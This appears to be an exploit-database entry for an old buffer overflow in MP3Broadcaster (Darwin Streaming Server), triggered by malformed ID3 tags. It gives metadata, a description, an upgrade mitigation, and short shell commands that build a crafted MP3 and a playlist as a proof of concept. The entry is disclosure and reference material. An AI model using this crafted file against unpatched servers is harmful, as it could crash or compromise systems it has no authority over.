header-logo
Suggest Exploit
vendor:
Darwin Streaming Server
by:
SecurityFocus
7.5
CVSS
HIGH
Insufficient Sanity Checks in MP3Broadcaster
119
CWE
Product Name: Darwin Streaming Server
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2002-0674
CPE: o:apple:darwin_streaming_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown
2002

Insufficient Sanity Checks in MP3Broadcaster

MP3Broadcaster is vulnerable to a buffer overflow when processing malicious ID3 tags due to insufficient sanity checks performed when handling signed integer values contained within MP3 file ID3 tags. An attacker can exploit this vulnerability by creating a specially crafted MP3 file and adding it to a playlist file.

Mitigation:

Upgrade to the latest version of MP3Broadcaster.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7660/info

MP3Broadcaster is shipped as part of Darwin Streaming Server software.

MP3Broadcaster has been reported prone to a vulnerability when processing malicious ID3 tags. This is likely due to insufficient sanity checks performed when handling signed integer values contained within MP3 file ID3 tags.

First create the sample configuration file:
$ echo -e "\n" > test.conf

Then create a playlist file:
$ echo -e "*PLAY-LIST*\nsong.mp3" > mp3playlist.ply

Create a specially crafted mp3 file:
$ echo -e
"ID3\x03\x00\x00\x00\x00\x0f\x0fTPE1\xff\xaa\xaa\xbb\x00\x00\x00\x00\x00\x00

" > song.mp3

Navigation

Suggest Exploit

Services By CQR